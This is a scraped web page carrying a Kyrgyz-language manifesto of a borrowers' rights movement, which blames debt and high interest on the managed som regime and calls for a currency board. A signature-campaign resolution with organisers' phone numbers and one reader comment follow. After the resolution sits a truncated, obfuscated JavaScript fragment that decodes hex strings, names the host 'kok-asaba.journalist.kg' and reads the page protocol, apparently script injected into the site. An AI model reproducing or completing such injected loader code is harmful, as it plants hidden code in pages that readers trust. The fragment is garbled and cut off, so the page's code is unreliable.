Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын манифести

5-ЧороевКубан  ЧОРОЕВ, манифесттин автору

Белчесинен карызга баткан кыргыз,

Үйлѳрүнѳн ажырап калган кыргыз.

Ѳлсѳ дагы карызын балдарына,

 Арман кылып мураска берген кыргыз.

Мына ушундай заманды кыргыз башынан кечирип отурган учур келди. Жүз миңдеген жарандарыбыз тирүү жүрүп алган насыяларын тѳлѳй албай, тозоктун азабын чегип жүрүшѳт. Алардын жашоодогу үмүтү ѳчүп, айласын таппай турган учуру. Мурун айыл жерлеринде жумушсуздуктан, кирешелеринин аздыгынан жана айыл чарба продукциясынын баасынын кескин тѳмѳндѳп кетишинен ѳз насыяларын тѳлѳѳдѳн кыйналып жүрүшсѳ, азыркы күндѳрү сода-сатыктын кескин токтоп калышынан базарларда иштеген миңдеген ишкер жарандарыбыз насыяларын тѳлѳй албай кыйын абалда калып олтурат.

Улуттук банктын статистикасына кѳз чаптырсак, 2015-жылдын аягына Кыргызстандын жарандары жана ишканалары коммерциялык банктарга гана 94 миллиард сомдон ашык сумма карыз, ал эми ѳлкѳдѳгү микрокредиттик уюмдарга жана кредиттик союздарга 15 миллиарддан ашык сом карыз. Бул карыздын 66%ы АКШ долларлык карыздар. Ошондой эле банктар берген кредиттердин орто тѳлѳм үстѳк пайызы сом менен 23% түзсѳ, доллар менен берилген кредиттердики 16% түзѳт. Ал эми микрофинансылык уюмдардын орто тѳлѳм үстѳк пайызы 30%ды  түзѳт. Демек, Кыргызстандын жарандары банктарга жана  микрофинансылык уюмдарга жалпысынан 109 миллиард сом карыз. Кыргызстандын жарандары  жылына жалаң гана үстѳк пайызды коммерциялык банктарга 21 миллиард сом, жана микрокредиттик уюмдарга 4,5 миллиард сом үстѳк пайызды тѳлѳп турушу керек, жалпысынан 25,5 миллиард сом. Ал эми Кыргызстанда болгон сомдун массасы 67 миллиард сомго барабар болгону белгилүү болсо, үстѳк пайызды тѳлѳѳгѳ гана акча массасынын үчтѳн бир бѳлүгүнѳн да көп сумма талап кылынат.

Үстѳк пайыз, бул биздин экономикабызда жок акчага салынып жатат, анткени биздин акча массабыз жыл сайын 30%га ѳскѳн жок. Демек, экономикабызда акча тартыштыгын банктарга жана микрофинансылык уюмдарга болгон карыздардын тѳлѳмүнүн кѳптүгү жаратып жатат. Эгерде жалпы кредиттик карыздардын үстѳк пайызынын 66%ы  АКШ доллары менен тѳлѳнѳѳрү белгилүү болсо, анда жылына кредиттердин жалпы суммасын албаганда, анын үстѳк пайызын тѳлѳѳгѳ эле 224,4 миллион АКШ доллары сарпталат. Бул жагдай, экономикабыздагы ички долларга болгон талаптын кѳбѳйүп, сомдун курсунун түшүп кетишине алып келген бирден-бир себептери болуп эсептелет.

Жалпы Кыргызстандын жарандарынын коммерциялык банктарга жана микрофинансылык уюмдарга болгон карызын Кыргызстандын 6 миллион элинин санына бѳлгѳндѳ, киши башына 18 миң сомду түзѳт, демек кыргыздын бешикте жаткан баласы да банк системасына 18 миң сом карыз, ал эми жыл сайын ошол карыздын үстѳк пайызын гана жапканга 4500 сом тѳлѳп туруш керек.

Акча жерге кирсин! Ал табылат! Бирок бизге кыргыз эли керек! Кыргыз керек! Бүгүнкү күндѳ миңдеген жаштар карыздын айынан ажырашып жатышат, миңдеген кыргыз балдары ата-энеси тирүү туруп  жетим калышты, миңдеген кыргыз тѳрѳлбѳй калды, миңдеген кыргыз карыздын айынан үй-жайсыз калып жатат, миңдеген келиндер буркурап, балдары чуркурап, ата-энелери кайгы-муңга батты. Миңдеген кыргыздын келиндери базардын ысык-суугуна чыдап бала-чакасын багайын деп кайран кыргыздын кайраты менен чыдап келатат. Бирок бүгүнкү күндѳгү кризис соода тармагында алектенген жүз миңдеген жарандарыбыздын кирешесин кыскартты, алар мурункудай оор пайыздарды тѳлѳѳгѳ дарамети келбей калды. Экономиканын кыскаруусунан миңдеген адамдар жумушсуз калып, банктарга жана микрокредиттик уюмдарга кредиттерин тѳлѳѳгѳ эмес, бала-чакасын бакканга кирешеси жок калышты.

акча7

Урматтуу замандаштар!

Кризис – бул Жараткандын бизге берген сыноосу. Жакшы адамдар кыйналганда тазарат. Адам адамды түшүнѳ баштайт. Биз бири-бирибизге боорукер боло баштайбыз. «Сабырдуулуктун түбү сары алтын» дейт. Ар бир жаман иштен кийин жакшылык келет, ар бир кыштын жазы бар.

25 жыл Кыргызстан ѳз алдынча мамлекет болгондон бери, ѳз акчабыз, банк системабыз түзүлүп ар бирибиз жакшы жашоо курабыз деп, бирибиз байуу максатында кредит алсак, бирибиз намыс үчүн, эл катары бололу деп аш-той ѳткѳргѳнгѳ, бирибиз муктаждыктын айынан кредит алып жаттык. Биз бул жылдары, чоң пайыздар менен кредиттерди алып алып, анын кесепеттерин, кандай азап-сыноолорун ѳтүп келебиз. Бир нечебиз мындан чоң тажрыйба алдык, кѳбүн эсебиз азыр деле кредит азабын башыбыздан кечирип келебиз.  Эгерде бул сыноодон биз татыктуу ѳтсѳк, ѳзгѳрүлсѳк, тазалансак, ниетибизди түздѳсѳк, анда  Жараткандын бизге берген бул оор сыноосу башыбызга даарыган кут болуп калышы мүмкүн.

Адамзатын Жараткан бактылуу болсун деп жаратты, жер жүзүндѳ, ааламда баардык нерсе адам баласынын урматына жана анын керектѳѳсүнѳ деп жаратты.  Бирок Жаратуучу адилеттүүлүктүн, теңдиктин, мээримдүүлүктүн, жаратылыштын мыйзамдарын орнотуп койду. Биз ал мыйзамдардан чекке чыксак бактылуу боло албайт экенбиз, тескерисинче, кылган ишибиздин азабын чегебиз. Жараткандын ар кайсыл коомдорго жана адамзатка түшүргѳн ыйык китептеринде сүткорлукка чектѳѳ салынган. Биз бүгүн сүткорлук коомубузга кандай азаптуу кесепеттерди алып келерин 24 жылдан бери башыбыздан ѳткѳрүп жатабыз. Анын коомго тийгизген терс таасирин жарандарыбызга түшүндүрүүнүн кажети деле жок.

Айтылган жагдайды Батыштын ири банк үйлѳрүнүн ээлери жакшы түшүнгѳн, анткени Библиянын жана Инжилдин трактаттарын жана философиясын алар жакшы билишкен жана ал коомдордо диндин ролу таасирдүү болот. Ошол себептен ал банк үйлѳрү ѳзүлѳрүнүн ѳлкѳлѳрүндѳ стабилдүү банк системаларын орнотушкан. Ал банк системасынын эң башкы философиясы экономикада ылдый пайызда кредиттик үстѳктѳрдү орнотуу. Ѳнүккѳн Батыш ѳлкѳлѳрүндѳ, бүгүнкү күндѳ кредиттик насыя пайыздары 3%дан 10% га чейин, ипотекалык кредиттер дээрлик 3%-5% менен 15-20 жылга берилет. Ал эми бизнес болсо ылдый пайызда узак мѳѳнѳттүү кредит алат жана алар чыгарган товарлардын кошумча наркында кредитти тейлѳѳ аз гана пайызын түзѳт. Ошол себептен Батыштын товарлары дүйнѳ рыногунда ѳтѳ конкуренттүү.  Бул, «карышкырлар да ток, койлор да аман» деген акча саясаты. Банктар да пайда кѳрѳт, коомго да пайда алып келет. Демек, стабилдүү коом, стабилдүү экономиканын, ѳнүккѳн ѳлкѳнүн башатында стабилдүү акча системасы турат. Мындай акча системасы Батыш ѳлкѳлѳрүндѳ болбогондо, ал коомдор эчак эле жок болуп кетмек.

Ушул эле жагдайларды эске алып ѳнүккѳн Араб ѳлкѳлѳрү, мисалы Сауд Аравиясы, Араб Эмираты, Катар, Кувейт, Бахрейн, Оман ж.б. мамлекеттер АКШ менен негизги нефт сатып алуучу мамлекет катары жана АКШ доллары дүйнѳлүк резервдик валюта болгондуктан 1971-жылы стратегиялык келишим түзүп, ѳз валюталарын АКШ долларына байлап, ѳлкѳлѳрүнѳ Валюталык башкаруу режимин орноткон. Анткени ѳз валютасын долларга байлап койуу –  бул доллар үчүн иштебей, доллар араб мамлекеттеринин кызыкчылыгы үчүн иштесин, доллардын күчү араб мамлекеттеринин кызыкчылыгына иштесин дегенди билдирет. Себеби, доллар дүйнѳнүн башка валюталарына салыштырмалуу канчалык күчтүү болгон сайын арабдардын риал-дирхамдары да ошончолук күчтүү болот дегенди билдирет. Доллар канчалык күчтүү болгон сайын, араб ѳлкѳлѳрүнүн жарандары ошончолук кѳбүрѳѳк керектѳѳчү товарларды башка ѳлкѳлѳрдѳн сатып алып бакубат турмушта жашай берет дегенди билдирет. Ооба, бүгүн нефт арзандап жатат, бирок нефт арзандаган сайын доллар кымбаттап турат. Демек, араб ѳлкѳлѳрүнүн валютасынын куну да, сатып алуу жѳндѳмдүүлүгү да ошончолук ѳсүп жатат, ошол себептен нефттин баасынын түшүшү аларга түйшүк жараткан жок, анткени алар доллардын күчүн ѳз кызыкчылыгына колдонуп жатат. 1971-жылдан бери араб ѳлкѳлѳрүнүн валюталарынын курсу долларга карата бир дагы тыйын ѳйдѳ да, ылдый да болбой туруктуу келет. Ошентип, араб ѳлкѳлѳрү дүйнѳдѳ стабилдүү валюталык режим орнотуу менен, ѳлкѳлѳрүндѳ ири финансылык рынокторду, фондулук биржаларды түзүштү, бүгүнкү күндѳ Ислам принциптерине негизделген финансылык система түзүүнүн үстүндѳ талыкпай иштеп, ѳз коомдорунун бакубаттуулугуна кам кѳрүп келишет. Инвестициялар мындай туруктуу акча системасы бар ѳлкѳлѳргѳ дүйнѳнүн ар тарабынан 40 жылдан бери агылып келип жатат.

Урматтуу замандаштар!

Бүгүнкү күндѳгү соцалдык-экономикалык кыйынчылыктардын, карыз сазына баткан кыргыздын акыбалынын башатында биздин 24 жыл мурун тандап алган акча системабыз турат. Биздин акча системабыз кыргыздын кызыкчылыгына иштебестен, тескерисинче карыз сазына баткырды.

Экономикалык кризис ѳлкѳдѳ баардык социалдык ооруларды ырбатты, анын ичинде жумушсуздук, жакырчылык, улуттун саламаттыгынын начарлашы, кылмыштуулуктун, ички жана тышкы миграциянын, каралбаган балдар жана жалгыз калган карылардын кѳбѳйүшү. Мына ушул социалдык дарттардын баардыгы экономикалык системабыздын иштешинен кѳз каранды. Ал эми экономиканын тамырын акча системасы түзѳт.

Кыргызстандагы бүгүнкү валюталык курсубуздун режими – Дүйнѳлүк валюта фондунун (МВФ) классификациясы боюнча «башкарылуучу режим» болуп эсептелет, бул «эркин сүзүүчү валюталык режимге» да кирбейт. Бул валюталык системаны акча теориясынын атасы болуп эсептелген, экономика илимдери боюнча Нобель сыйлыгынын ээси, экономист Милтон Фридман 1972-жылы эле «Ѳнүгүп жаткан ѳлкѳлѳрдѳгү акча саясаты» деген эмгегинде эң туруксуз жана жаңыдан ѳнүгүп келе жаткан ѳлкѳлѳргѳ чоң зыян алып келе турган система деп аныктама берген. Тилекке каршы, биз ушул валюталык системаны ѳлкѳбүзгѳ негиз кылып 1993-жылы сомду кабыл алганда орнотуп алдык.

Эмне үчүн Фридмандын аныктамасына ылайык бул «башкарылуучу валюталык режим» биздикиндей ѳлкѳгѳ залакасын тийгизет? Буга ондогон себептер бар, биз эң олуттуу жети себебин белгилеп кетели.

Биринчи себеп, мындай акча системасында сомдун кунун биз араң жан экономикабызга байлап койдук.

Экинчи себеп, бул системада туруксуздук ар дайым болуп тургандыктан Улуттук банк менен Ѳкмѳттүн каталары үчүн жѳнѳкѳй жарандар чѳнтѳгүнѳн тѳлѳйт, ѳкмѳт менен Улуттук банктын жоопкерчилиги жок, бирок сомдун кунунун түшүшүнѳ таасири чоң.

Үчүнчү себеп, мындай валюталык режим иштеп жаткан ѳлкѳлѳрдѳ кредиттик үстѳк пайыздар эч качан жогоруда айтылган ѳнүккѳн ѳлкѳлѳрдүкүндѳй ылдый пайызда болбойт, тескерисинче, улуттук валюта менен берилген кредиттер ѳтѳ чоң үстѳк пайызда берилип, элдин баарын карызга батырып коомду бузат.

Тѳртүнчү себеп, мындай валюталык режим иштеген ѳлкѳлѳрдѳ инфляциянын жана девальвациянын деңгээли бийик болуп жылдан жылга жашоо кымбаттай берет, бирок айлык акы андай темп менен ѳспѳйт.

Бешинчи себеп, кредиттердин кымбаттыгынан ишканалар  кредиттерин тѳлѳй албай, иши токтойт, анткени алардын чыгарган товарларынын кошумча наркында олчойгон кредиттердин пайыздары олтурат. Демек, ал товарлар кошуна мамлекеттердин товарларына атаандаштык түзѳ албайт жана ѳлкѳнүн экспорттук жѳндѳмдүүлүгү жокко эсе болот.

Алтынчы себеп, мындай валюталык режимде банк системасында ар дайым акча тартыш болот. Бир эле мисал: Кыргызстандын ички дүң продукциясы 400 миллиард сомду чамаласа, экономикабызда болгон акча массабыз 67 миллиард сомду эле түзѳт. Бул жагдай биздин экономикабыз 16 %га эле улуттук валюта менен камсыз дегенди билдирет. Ѳнүккѳн ѳлкѳлѳрдѳ бул экономиканын монетизация кѳрсѳткүчү 150 % – 200 %ды түзѳт. Эгер биздин экономикадагы баарлык сомду чогултсак, Казакстандын орточо бир олигархынын дүнүйѳсүн сатып алганга жетпейт. Мына биздин акча системабыз бизди кайсы сазга киргизгени.

Жетинчи себеп, биздикиндей акча системабызда, мамлекеттин бюджетине келген кредит менен гранттар сомдун девальвациясына алып келип, ал кредиттер кайра Улуттук банктын резервин толуктап, биздин Улуттук банктын резервдерин кармаган Батыштын банктарынын кызыкчылыгына иштейт. Ошол эле маалда, Кыргызстандын тышкы карызын кѳбѳйтѳ берет. Бир эле мисал, Россия Федерациясынын ѳкмѳтү, бизге кызматташтыкты чыңдоо жана экономиканы ѳнүктүрүү максатында жардам катары 500 млн. доллар бѳлдү, анын 250 млн. доллары бүгүнкү күндѳ фонддун эсебине түштү. Бул акчаны биздин ѳкмѳт улуттук валюта менен ар кандай бизнес долбоорлорун жана мамлекеттик ипотека компаниясына каржылоого шымаланып жатат. Ал эми чынында, бул 250 миллионду биздин Улуттук банк ѳзүнүн резерви сакталган Батыштын банктарына которот, жана ал Батыштын банктарынын кызыкчылыгына иштейт, андан түшкѳн пайыздарга биздин Улуттук банк жашайт. Ал эми Улуттук банк басып берген сомдор, биздин экономикага жанагы ѳкмѳттүн долбоорунун алкагында кирип сомдун девальвациясына, кайрадан мурун доллар менен кредит алгандардын шоруна алып келет.

Кыргыздын жакшынакай уул-кыздары бүгүн Улуттук банкты башкарып келет, акылы десең акылы, билими десең билими бар. Бирок бул акча системасы канчалык деңгээлде кыргыз элин азап чектирип жатканы, ошол уул-кыздардын колу менен кыргыздын келечегине балта чабылып жатканын сезбегенине таң калбай койбойсуң.

Ушул себептерден улам, бул маселе мамлекеттик саясаттын номур бир маселеси болуш керек, анткени, жогоруда баамдалгандай акча системасы ѳлкѳбүздѳ жашап жаткан алты миллион адамдын жашоо-турмушун, тагдырын аныктоочу негизги фактор болуп эсептелет. Тилекке каршы, 24 жылдан бери мамлекет тарабынан бул маселе бир дагы жолу кѳтѳрүлгѳн эмес. Биз саясый жана укуктук реформаларга кѳңүл бура берип, акча системаны ойлоп да койгон жокпуз. Ошондуктан бүгүн мына ушундай экономикалык тунгуюк абалда олтурабыз. Катардагы жарандар бүгүн кандай гана болсун саясый реформаларга ишенбей калды, анткени алар анын таасирин ѳз турмушунда сезишкен жок.

frxf4

Урматтуу замандаштар!

Кыргыз эли кылымдар бою мындай олуттуу маселелерди кабыргасынан коюп, ийри отуруп, акылкалчап, ачыксүйлѳшүп, түзчечипкелчүэле. Бирок биз кыргыздын мындай баалуулугунан тайып бараткандайбыз. Жаат-жаат, оппозиция-позиция, партия болуп бѳлүнүшүп, кыргызга бүлүк салынды. “Бѳлүнбѳ кыргыз, бѳлүнбѳ, бѳлүнсѳң бѳрү жеп кетет. / Бѳлүнүп кыргыз кетти деп, бѳлѳк элге кеп кетет” деп улуу акылмандарыбыз насаатын айтып кетти эле. Эгер биз бирибиз менен бирибиз тил табышышалбай, акылга келбей, ортодо ырк кетсе, анда бул коомдун «барынан жогу».

Урматтуу замандаштар!

Бүгүн кыргыз коомчулугунда келечекти аныктоочу эки олуттуу маселе турат.

Биринчи маселе, карыз сазына баткан насыя алуучулардын насыясынын пайызын тѳмѳндѳтүп, мѳѳнѳтүн узартып берүү.  Ошол эле кезде жалгыз үйүнѳн ажыраган, кыйналып насыясын тѳлѳй албай соттошуп жүргѳн  бойдок келиндерди, жетимдерди жана дүйнѳ салган жарандарды насыясынан куткаруу.

Экинчи маселе, мындай акыбалга кайрадан келбес үчүн стабилдүү насыялар 10%дан ашпаган акча системасын Кыргызстанга орнотуу.

Бекитилген эки маселени чечүүнүн да анык жолу бар. Кыргызстан МВФтин классификациясы боюнча англисче «currencyboard» же кыргызчасы «валюталык башкаруу»  акча системасына (валюталык режимге) ѳтүүбүз зарыл.

«Валюталык башкаруу» режиминде сомдун курсу АКШ долларына бир курс менен мыйзам менен бекитилет, экономикабыздагы сомдун массасы толугу менен Улуттук банктын резервине байланат. Бул деген сомдун курсу экономикабыздагы башка факторлордон, мисалы импорттун, экспорттун кѳлѳмүнѳн, мигранттардын акча которуусунан, инвестициялардан, же болбосо кошуна Россиянын рублинин жана Казакстандын теңгесинин девальвациясынан эч кандай кѳз карандысыз болуп калат дегенди билдирет. Кандай гана экономикабызда проблемалар болбосун, сомдун курсу туруктуу тура берет. Анткени, сомду каалаган убакта мыйзамда бекитилген курс менен долларга, же тескерисинче, долларды сомго айландыруу процесси мыйзамга ылайык Улуттук банк тарабынан токтолбостон иштей берет.

Албетте, бизде бул режимге ѳткѳнгѳ Улуттук банктын резерви жетиштүүбү деген суроо туулушу мүмкүн. Улуттук банктын «валюталык башкаруу» режимине ѳтүүгѳ резервдери жетиштүү. Ноябр айынын 1ине карата Улуттук банктын резерви 1 млрд. 897 млн. АКШ долларын түзѳт, ал эми Кыргызстандагы акча базабыз, тагыраак айтканда, экономикабыздагы болгон сомдун массасы 67 млрд. сомдун тегерегин түзѳт. Демек, бүгүнкү күндѳгү курс менен сомдун курсун бекитүүгѳ 900 млн. доллардын тегерегиндеги резерв жетиштүү болот. Мындан ары эгерде Улуттук банкка коммерциялык банктар, же болбосо Кыргызстандын ѳкмѳтү доллар сатса. Улуттук банк жаңы сом басып бере берет мыйзамда бекитилген курс менен, ал эми сом алып келсе, бекитилген курс менен кайра долларга алмаштырып берип турат. Мындайча айтканда, Улуттук банк Кыргызстандагы генералдык акча алмаштыруу пунктуна айланат жана резервдеги доллар менен экономикада тегеренип жүргѳн сомдун массасын бир курс менен теңдикте сактап келет. Бул кынтыксыз система эч качан бузулбайт. Анткени резервдеги доллардын массасы кѳбѳйгѳн сайын экономикадагы сомдун массасы кѳбѳйѳт, жана тескерисинче, сомдун массасы азайган сайын, резервдеги доллар азайып турат, бирок теңдик бузулбайт жана курс ѳзгѳрбѳйт. Бул системаны акча алмаштыруучу жайларда иштеген жигиттерибиз жакшыраак түшүнсѳ керек.

«Валюталык башкаруу» системасына ѳтүү бир гана сомдун туруктуулугун долларга бекитүүнү гана алып келбестен, 24 жыл бою кыргыз элинин эсебинен чогултулган Улуттук банктын эл аралык резервдерин кайтарып, кыргыз элинин кызыкчылыгына иштетүүгѳ шарт түзѳт.

Биз ѳйдѳдѳ баамдагандай, 1 млрд.  897 млн. доллар резерв бар дедик. Бул резервдин 900 млн. доллары сомду туруктуу кармоого Улуттук банктын ликвиддүү резерви болуп калат. Ал эми калган 1 миллиард долларын биз Батыш мамлекеттеринин банктарынан Кыргызстанга кайтарышыбыз керек. 24 жыл бою бул акчаларды биз Батыш мамлекеттерине инвестиция кылып, 1-2%дык үстѳк пулун Улуттук банк колдонуп келди. Бул резерв эми кыргыздын кызыкчылыгына иштээр мезгил келип жетти.

1 млрд. доллар менен биз Кыргызстандын кайра каржылоо жана ѳнүктүрүү мамлекеттик банкын «Айыл банк» же РСКнын базасында түзүшүбүз керек. Мына ушул 1 млрд. резерв бекитилген курс 75 сом/доллар болгондо 75 млрд сом болот. Бул акчага 15 млрд. сомду түзгѳн элдин микрофинансылык компаниялардан 30-40 пайыздык үстѳк менен алынган оор насыялары айтылган мамлекеттик банк тарабынан сатып алынышы керек. Андан кийин эл мамлекеттик банкка карыз болуп калат, бирок бул насыялардын үстѳк пайызы 5-7% тегерегинде эле болуп жана мѳѳнѳттѳрү узарып, банк тарабынан насыяны тейлѳѳнүн гана акысын жабыш керек.

Калган 60 млрд. сом менен Кыргызстандын кайра каржылоо жана ѳнүктүрүү банкы, коммерциялык банктардан насыя алуучулардын ипотекалык жана керектѳѳчү кредиттерин кайра каржылап пайыздарын 5-7%га  жеткирип, ипотекалык кредиттердин мѳѳнѳттѳрүн 15 жылга чейин создуруп берүүсү керек.

Ошол эле маалда, насыя алуучулардын ай сайын мамлекеттик банкка тѳккѳн тѳлѳмдѳрүн кайра башка насыя алуучуларга берип, бул 75 млрд. сом кайра эле экономикабыздын керектѳѳсүнѳ тегеренип, элдин кызыкчылыгына иштеп турат.

Эгерде мындай режим ушунчалык жакшы болсо, эмне үчүн башка мамлекеттер мындай системаны ѳзүлѳрүнѳ киргизген жок деген да экинчи суроо туулушу мүмкүн. Бул система 20-кылымдын башында эле пайда болгон жана бүгүнкү күнү мындай жана буга тектеш валюталык режимди дүйнѳнүн 60 мамлекети колдонот. Алардын ичинде Гонконг, 2015-жылга чейин Литва колдонгон (кийин еврого ѳттү), Болгария, Дания, Гренландия, Фареры, Бруней, Бахрейн, Сауд Аравиясы, Оман, Катар, Кувейт, Иордания, Бириккен Араб Эмираты, Марокко, Венесуэла, Бутан, Непал ж.б.

Эгерде Кыргызстан ушул «валюталык башкаруу» акча системасына ѳтүп калса, экономикабызга дагы кандай таасир этиши мүмкүн деген суроо туулушу ыктымал.

«Валюталык башкаруу» системасы ѳлкѳдѳ инфляциянын деңгээлинин кескин төмөндөшүн, экономиканын интенсивдүү өсүшүн шарттайт. Кыргызстандын инфляциясы жылына 1-3% дык деңгээлде гана болот, анткени доллардын инфляциясы жылына ушул деңгээлден ашпайт. Ошондуктан Кыргызстандын жарандары узак мөөнөттүү келечекте көндүм болгон баанын жогорулашынан арылат. Инфляциялык коркунучту төмөндөтүү, девальвация коркунучун жок кылуу жана кыргыздын сомуна ишенимди бекемдөө акча сактоолордун өсүшүнө көмөк көрсөтөт, ал эми алар өз кезегинде экономикалык өсүштүн ылдам темптерин камсыз кылуу менен ички жана чет өлкөлүк инвестициялардын өсүшүн генерациялайт.

«Валюталык башкаруу» системасы банктык насыялар боюнча чендердин төмөндөөсүн жана банк секторунда сом менен депозиттердин көлөмдөрүнүн өсүшүн шарттайт. Инфляциялык жана девальвациялык күтүүлөрдү жок кылуу – бул насыялар боюнча үстөктүк чендердин төмөндөөсүнө алып келет. Жарандар инфляциядан жана девальвациядан коркпостон акчаларын сом менен депозиттик эсептерге узак мөөнөттүү негизде сала баштайт, бул болсо келечекте Кыргызстандын экономикасында туунду акчалардын пайда болушуна дем берет. Демек, экономиканын туруктуу өсүшүн камсыз кылат. Акча-кредиттик системанын туруктуулугу коммерциялык банктар тарабынан сом депозиттерди тартуу үчүн жагымдуу шарттарды түзөт. Сом менен берилген кредиттин үстѳк пулу доллардыкы менен барабар болуп калат, анткени айтылгандай сомдун курсу доллар менен бир курс менен байланып калат да.

Экономиканын долларлашуусунун жана АКШ долларына болгон талаптын деңгээлинин төмөндөөсү бир гана «валюталык башкаруу» системасында ишке ашат. Топтоонун каражаты катары сом бардык мүнөздөмөлөрү боюнча АКШ доллары менен барабар болуп калат, демек, жарандар өздөрүнүн баардык долларлык топтоолорун сомго алмаштырып алышат. Бүгүнкү күндө калктын колунда доллар менен канча суммадагы накта акча бар экендиги белгисиз, бирок бул эбегейсиз сумма эки орундуу миллиарддар менен белгиленет болуш керек. Бирок мындай эбегейсиз сумманын өлкөгө сактоонун каражаты катары кереги жок болот, ошондуктан долларлар активдүү түрдө сомго алмашылып, КРнын Улуттук банкынын резервин толуктайт. Так ошондо биздин экономикада канча доллар болгондугу белгилүү болот. Долларлар Кыргызстандын экономикасында тышкы соода операцияларында гана пайдаланылып калат. Ал эми долларга болгон ички сурам жок болуп кетиши керек, анткени бардык ири акча операциялары – товарларды жана кызматтарды жөнөтүү, кыймылдуу жана кыймылсыз мүлктөрдү сатуу-сатып алуу боюнча операциялар, мыйзам ченемдүү түрдө сактоонун башкы каражаты болгон валютада, башкача айтканда, сом менен жүргүзүлө баштайт.

Сомдун тышкы соода балансынын көрсөткүчтөрүнө туруктуулугу шартталат.  «Валюталык башкаруу» режимине ѳткѳндѳн кийин Улуттук банк жана Өкмөт өлкөнүн тышкы соода балансынын абалы жөнүндө кабатыр болбойт, анткени анын абалына сомдун курсу көз каранды болбой калат. Сомдун курсу доллардын башка валюталарга болгон курсуна гана көз каранды болот. Ал эми импорттун жана ошондой эле экспорттун көбөйүшү жана азайышы өлкөдөгү товарлардын рыноктук бааларына гана таасирин тийгизет. Мындайча айтканда, Кыргызстанда рыноктук баанын табигый түзүлүшү орун алат.

«Валюталык башкаруу» системасына ѳткѳндѳн кийин өлкөнүн улуттук валютасы азыркы нечен жолку болуп жаткандай, дүйнөлүк жана регионалдык валюталык олку-солкулуктардын таасирине дуушар болбойт. Орусиялык рублдин жана казак теңгесинин девальвациясы кыргыз сомуна мурдагыдай таасирин тийгизе албай калат. Дүрбөлөңчүл маанайлар, белгисиздик жана Кыргызстандын чабал банктык системасына болгон ишенимдин төмөнкү деңгээли КР Улуттук банкынын сомдун курсун мурдагы деңгээлге кармап турууга болгон аракетинен майнапсыз болуусуна алып келди. Бул болсо биздин валютанын баалуулугун сактап калууга болгон Улуттук банктын мүмкүнчүлүктөрүнө күмөн саноолорду пайда кылды. Ал турмак, коңшу өлкөнүн президенти Нурсултан Назарбаев толук бийликке ээ болуу менен, өлкөнү казак валютасынын девальвациясына карата болгон тынчсызданууларынын негизсиздигине ынандырып жатып, теңгенин төмөндөөсүн кармай албай калды. Бул акчанын ишенимдүүлүктү жактыргандыгынын, алардын баалуулугун кимдир-бирөөгө же кайсы-бир органга ишенип берүүгө болбостугунун көрүнүктүү мисалы. Демек, эч нерсе жана эч ким акчанын баасын дүйнѳлүк күчтүү валютага байлагандай мыкты сактай албайт.

Чет ѳлкѳлүк инвестициялар дайыма саясый гана эмес, экономикалык дагы туруктуу ѳлкѳлѳргѳ тартылышат. “Валюталык башкаруу” системасына ѳткѳндѳн кийин, инвесторлор сом девальвация болбосуна ишенип, капиталдарын коркпостон биздин финансылык институттарга салганга жакшы жагдай түзүлѳт. Бул экономиканы монетизация коэффициентинин жогорулоосуна алып келет, башкача айтканда, экономиканын акча менен, демек, инвестициялар менен дагы камсыз болуусуна алып келет.

Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылы

Бишкек шаары, Киев көчөсү 77, кв. 53, kenekeeva.akylay@mail.ru тел.: 0778 31-79-18.

Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын манифестине карата

Untitled-1

 

РЕЗОЛЮЦИЯ

Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын жалпы Бишкек, Ош шаарындагы жана Чүй, Ош, Жалалабат, Баткен, Ысык-Кѳл, Нарын, Талас облустундагы координаторлоруна жана мүчѳлѳрүнѳ.

«Кыргызстандагы насыя алуучулар бириккиле!» деген чакырык менен Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын манифестин тааныштыруу, талкуулоо, колдоо жана аны ишке ашыруу талабына кол чогултуу кампаниясын 28-декабрдан тарта баштасын.

Ар бир регионалдык координаторлор Манифестти колдоо каты менен кол чогултуу баракчаларын тийиштүү Кыргыз Республикасынын Ѳкмѳтүнүн облустук жана райондук ыйгарымдуу ѳкүлчүлүктѳрүнѳ ѳткѳрүп, Кыргыз Республикасынын Президентине, Жогорку Кенешине, Ѳкмѳтүнѳ жана Улуттук банкына жеткирүүсүн талап кылсын.

Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын манифестин эл арасына жайылтуу, талкуулоо жана колдоо үчүн кол чогултуу кампаниясы 2 айлык мѳѳнѳткѳ – 2016-жылдын 1-мартына чейин деп бекитилсин.

Резолюцияны ишке ашырууга республикалык деңгээлде жана жер-жерлерде тѳмѳнкү мүчѳлѳр ыйгарымдуу болуп дайындалсын:

Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын:

Тѳрайымы – Акылай Кенекеева  0558317918

Теңтѳрагасы – Кубат Токсобаев  0551 883477

Чуй облусунун координатору  0778317918

Ош облусунун координатору  0772635747

Жалал-Абад облусунункоординатору  0771145161 

Баткен облусунун координатору  0772222855

Ысык-Кѳл облусунун координатору  0558006794, 0559520666

Нарын облусунун координатору  0558317918

Талас облусунун координатору  0778019879.

 

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

8 thoughts on “Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын манифести

  1. Биздин тышкы карызыбыз 3.6 млрд доллар. Ал эми мунун 6%га жакыны МВФтен. Менин оюмча биздин УБ МВФтин айтканынан чыга албай ушундай саясат жургузуп атат. Б.а саясий коз карандылыктын айынан. Бул коз карандылыка себеп МВФ тен болгон карызыбыз. МВФтин негизги чон акционерлери болсо АКШ Англия сыяктуу онуккон мамлекеттер. Ал эми булар болсо биздин онушубузду каалабайт. Эгерде каалаганда акча системасын кабыл алып жатканыбызда эле МВФ бизге пайдалуусун сунуштамак. Бул менин жеке оюм. Биз биринчи МВФ тен болгон карызды толосок сиздер айткан системага оной эле отушубуз мумкун. Ачык айтылбасада тышкы коз карандыны эске алып коюу керек

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *